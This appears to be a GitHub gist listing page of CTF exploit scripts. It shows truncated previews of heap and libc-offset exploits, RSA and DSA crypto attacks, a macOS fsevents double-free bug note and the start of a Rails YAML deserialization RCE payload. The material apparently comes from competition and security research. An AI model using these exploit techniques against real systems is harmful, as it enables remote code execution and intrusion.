Niklas Baumstark niklasb
niklasb
/ ohfortuna.py
Last active
November 18, 2017 15:19
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from subprocess import Popen, PIPE | |
| import base64 | |
| import random | |
| import re | |
| import requests | |
| import select | |
| import socket | |
| import string | |
| import struct | |
| import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import telnetlib | |
| import time | |
| import struct | |
| import sys | |
| TARGET=('localhost', 1337) | |
| offset___libc_start_main_ret = 0x203f1 | |
| offset_system = 0x00000000000456d0 |
niklasb
/ robot_pwnage.py
Last active
May 4, 2024 16:55
Exploit for 'wheel of robots' from insomni'hack 2017
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| # https://github.com/niklasb/ctf-tools/blob/master/pwnlib/tools.py | |
| from pwnlib.tools import * | |
| TARGET=('localhost',5000) | |
| INTERVAL=0 | |
| offset_free = 549184 | |
| offset_system = 0x456d0 |
niklasb
/ gist:416b333cb973812b39c085a42f5c19c4
Last active
April 3, 2017 18:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The `FSEVENTS_DEVICE_FILTER_64` command for the fsevents device's `ioctl` method has a race condition bug which can lead to double `free` when the user decides to update the number of devices to 0. | |
| static int | |
| fseventsf_ioctl(struct fileproc *fp, u_long cmd, caddr_t data, vfs_context_t ctx) | |
| { | |
| fsevent_handle *fseh = (struct fsevent_handle *)fp->f_fglob->fg_data; | |
| int ret = 0; | |
| fsevent_dev_filter_args64 *devfilt_args, _devfilt_args; | |
| OSAddAtomic(1, &fseh->active); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Implementation based on attack from | |
| # http://www.hpl.hp.com/techreports/1999/HPL-1999-90.pdf | |
| import socket | |
| import telnetlib | |
| import random | |
| from hashlib import sha1 | |
| from sage.all import inverse_mod, matrix, vector | |
| TARGET = ('185.143.173.36', 1337) | |
| sock=socket.create_connection(TARGET) |
niklasb
/ ctfzone_pwn.py
Created
July 18, 2017 15:56
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # First stage: unsafe unlink | |
| # Second stage (via a tunnel through a ROP chain): fastbin free pointer corruption | |
| from pwn import * | |
| import struct | |
| import sys | |
| offset_close = 0x00000000000f78b0 | |
| offset_env = 0x3c6f38 |
niklasb
/ gracias.py
Last active
October 10, 2018 11:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import continued_fraction, Integer, inverse_mod | |
| pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
niklasb
/ handicraft.py
Created
September 10, 2017 20:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import * | |
| import base64 | |
| def factor(n,b): | |
| M=1 | |
| print 'start' | |
| a = 2 | |
| i=0 | |
| for q in primes(b): | |
| i+=1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from sage.all import continued_fraction, Integer, inverse_mod | |
| pubkey = (1696852658826990842058316561963467335977986730245296081842693913454799128341723605666024757923000936875008280288574503060506225324560725525210728761064310034604441130912702077320696660565727540525259413564999213382434231194132697630244074950529107794905761549606578049632101483460345878198682237227139704889943489709170676301481918176902970896183163611197618458670928730764124354693594769219086662173889094843054787693685403229558143793832013288487194871165461567L, 814161885590044357190593282132583612817366020133424034468187008267919006610450334193936389251944312061685926620628676079561886595567219325737685515818965422518820810326234612624290774570873983198113409686391355443155606621049101005048872030700143084978689888823664771959905075795440800042648923901406744546140059930315752131296763893979780940230041254506456283030727953969468933552050776243515721233426119581636614777596169466339421956338478341355508343072697451L, 17101222758731850777 |
niklasb
/ railspwn.rb
Last active
March 7, 2021 12:14
Rails 5.1.4 YAML unsafe deserialization RCE payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'yaml' | |
| require 'base64' | |
| require 'erb' | |
| class ActiveSupport | |
| class Deprecation | |
| def initialize() | |
| @silenced = true | |
| end | |
| class DeprecatedInstanceVariableProxy |